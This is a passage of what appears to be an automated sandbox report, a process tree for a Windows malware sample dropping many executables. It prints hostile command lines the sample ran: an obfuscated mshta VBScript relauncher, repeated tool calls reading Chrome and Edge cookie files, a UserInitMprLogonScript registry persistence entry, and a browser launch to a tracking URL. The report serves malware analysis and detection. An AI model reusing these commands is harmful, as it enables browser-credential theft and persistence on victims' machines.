    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2932
- C:\Users\Admin\Documents\t7Xvr_mcY4U0EgrksDdHs2hI.exe
  "C:\Users\Admin\Documents\t7Xvr_mcY4U0EgrksDdHs2hI.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4560
- - C:\Users\Admin\Documents\t7Xvr_mcY4U0EgrksDdHs2hI.exe
    C:\Users\Admin\Documents\t7Xvr_mcY4U0EgrksDdHs2hI.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4804
- C:\Users\Admin\Documents\dfTxMY_IfJyT9BulZM6DJnA2.exe
  "C:\Users\Admin\Documents\dfTxMY_IfJyT9BulZM6DJnA2.exe"
  2⤵
  - Executes dropped EXE
  PID:4576
- C:\Users\Admin\Documents\NGSx7_M3OHWSeBxQFu9pEcYE.exe
  "C:\Users\Admin\Documents\NGSx7_M3OHWSeBxQFu9pEcYE.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4584
- - C:\Users\Admin\Documents\NGSx7_M3OHWSeBxQFu9pEcYE.exe
    C:\Users\Admin\Documents\NGSx7_M3OHWSeBxQFu9pEcYE.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5000
- C:\Users\Admin\Documents\xmwrvdcY_Yfi3N5BkNTNaobs.exe
  "C:\Users\Admin\Documents\xmwrvdcY_Yfi3N5BkNTNaobs.exe"
  2⤵
  - Executes dropped EXE
  PID:4568
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 280
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1288
- C:\Users\Admin\Documents\GaGn0YZ1Xn4dsxDCBdKU27Z4.exe
  "C:\Users\Admin\Documents\GaGn0YZ1Xn4dsxDCBdKU27Z4.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:3852
- C:\Users\Admin\Documents\bp6rLacE0rY6LNrjOO_TxmEr.exe
  "C:\Users\Admin\Documents\bp6rLacE0rY6LNrjOO_TxmEr.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5036
- - C:\Users\Admin\AppData\Roaming\1480338.exe
    "C:\Users\Admin\AppData\Roaming\1480338.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4720
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 2436
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:7544
- - C:\Users\Admin\AppData\Roaming\5632698.exe
    "C:\Users\Admin\AppData\Roaming\5632698.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2800
- - C:\Users\Admin\AppData\Roaming\3678300.exe
    "C:\Users\Admin\AppData\Roaming\3678300.exe"
    3⤵
    PID:2584
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      Executes dropped EXE
      PID:4980
- - C:\Users\Admin\AppData\Roaming\4175631.exe
    "C:\Users\Admin\AppData\Roaming\4175631.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4676
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4676 -s 2324
      4⤵
      Program crash
      PID:5128
- C:\Users\Admin\Documents\gwyroycDer67hXuPDw56Y8dx.exe
  "C:\Users\Admin\Documents\gwyroycDer67hXuPDw56Y8dx.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3060
- C:\Users\Admin\Documents\O5TjB46UfglGUEdrVFJnqcV8.exe
  "C:\Users\Admin\Documents\O5TjB46UfglGUEdrVFJnqcV8.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2988
- - C:\Users\Admin\Documents\O5TjB46UfglGUEdrVFJnqcV8.exe
    "C:\Users\Admin\Documents\O5TjB46UfglGUEdrVFJnqcV8.exe" -q
    3⤵
    - Executes dropped EXE
    PID:3396
- C:\Users\Admin\Documents\4TxEGrcFaLMUzJf7EnXhU_B_.exe
  "C:\Users\Admin\Documents\4TxEGrcFaLMUzJf7EnXhU_B_.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:2344
- C:\Users\Admin\Documents\kWs5sSjR4k3xXHmO4XLag8d6.exe
  "C:\Users\Admin\Documents\kWs5sSjR4k3xXHmO4XLag8d6.exe"
  2⤵
  - Executes dropped EXE
  PID:3684
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 316
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4744
- C:\Users\Admin\Documents\W4sDxcb8D309KQCgTNmXJRUk.exe
  "C:\Users\Admin\Documents\W4sDxcb8D309KQCgTNmXJRUk.exe"
  2⤵
  - Executes dropped EXE
  PID:3104
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 236
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2528
- C:\Users\Admin\Documents\BfG52BypxnLPuragVMr93q4y.exe
  "C:\Users\Admin\Documents\BfG52BypxnLPuragVMr93q4y.exe"
  2⤵
  - Executes dropped EXE
  PID:3896
- C:\Users\Admin\Documents\pIQ3ulIMRDHkTcxzXZA50m3y.exe
  "C:\Users\Admin\Documents\pIQ3ulIMRDHkTcxzXZA50m3y.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3272
- C:\Users\Admin\Documents\6dBlR9ES_h9uZiKUQGcURO6C.exe
  "C:\Users\Admin\Documents\6dBlR9ES_h9uZiKUQGcURO6C.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1888
- - C:\Program Files (x86)\Company\NewProduct\jooyu.exe
    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
    3⤵
    - Executes dropped EXE
    PID:3696
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4720
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:5756
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:5212
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:3016
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:2256
- - C:\Program Files (x86)\Company\NewProduct\customer3.exe
    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
    3⤵
    - Executes dropped EXE
    PID:3368
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Executes dropped EXE
      PID:5036
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:3644
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Executes dropped EXE
      PID:5256
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:3032
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:1188
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:5440
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:2952
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6008
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:7272
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:2652
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6180
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6296
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:7500
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:7208
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:924
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:5700
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6248
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:1512
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:2384
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:5628
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6116
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4560
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:7540
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:2732
- C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe
  "C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4984
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
    3⤵
    PID:1624
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe" ) do taskkill -f -iM "%~NxA"
      4⤵
      PID:3408
    - - C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
        
        hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
        5⤵
        
        PID:3676
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
        6⤵
        
        PID:2876
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
        7⤵
        
        PID:4812
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
        6⤵
        Loads dropped DLL
        
        PID:4404
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "zT7lzmRyAz5Sh_dhGoZkPLf_.exe"
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3348
- C:\Users\Admin\Documents\JReCxrSZ5O_Lnjfb2WaAEeOU.exe
  "C:\Users\Admin\Documents\JReCxrSZ5O_Lnjfb2WaAEeOU.exe"
  2⤵
  - Executes dropped EXE
  PID:968
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 968 -s 276
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:3392
- C:\Users\Admin\Documents\DpLRG_KNuUytQZuMpgd6PuVG.exe
  "C:\Users\Admin\Documents\DpLRG_KNuUytQZuMpgd6PuVG.exe"
  2⤵
  - Executes dropped EXE
  PID:1068
- - C:\Users\Admin\AppData\Local\Temp\is-8SO3I.tmp\DpLRG_KNuUytQZuMpgd6PuVG.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-8SO3I.tmp\DpLRG_KNuUytQZuMpgd6PuVG.tmp" /SL5="$202AE,138429,56832,C:\Users\Admin\Documents\DpLRG_KNuUytQZuMpgd6PuVG.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:3108
  - - C:\Users\Admin\AppData\Local\Temp\is-OFA81.tmp\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\is-OFA81.tmp\Setup.exe" /Verysilent
      4⤵
      PID:3232
    - - C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
        5⤵
        
        PID:1296
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 300
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3628
    - - C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
        5⤵
        
        PID:2428
      - C:\Users\Admin\AppData\Local\Temp\is-CTKNO.tmp\Inlog.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CTKNO.tmp\Inlog.tmp" /SL5="$9020C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\is-ODK44.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-ODK44.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
        7⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\is-0N4EO.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0N4EO.tmp\Setup.tmp" /SL5="$20568,17367866,721408,C:\Users\Admin\AppData\Local\Temp\is-ODK44.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
        8⤵
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:7420
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-1LK48.tmp\{app}\microsoft.cab -F:* %ProgramData%
        9⤵
        
        PID:8060
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-1LK48.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        10⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
        9⤵
        
        PID:7960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
        10⤵
        
        PID:480
        
        C:\Users\Admin\AppData\Local\Temp\is-1LK48.tmp\{app}\vdi_compiler.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1LK48.tmp\{app}\vdi_compiler"
        9⤵
        Executes dropped EXE
        
        PID:3676
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 292
        10⤵
        Program crash
        
        PID:6352
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
        9⤵
        
        PID:1232
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
        10⤵
        
        PID:5280
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c94718
        11⤵
        
        PID:7756
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2
        11⤵
        
        PID:6788
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
        11⤵
        
        PID:4396
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:8
        11⤵
        
        PID:1488
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
        11⤵
        
        PID:7444
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        11⤵
        
        PID:7272
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
        11⤵
        
        PID:2792
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1
        11⤵
        Executes dropped EXE
        
        PID:3032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4456 /prefetch:8
        11⤵
        
        PID:5092
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1
        11⤵
        
        PID:4124
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
        11⤵
        
        PID:6392
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
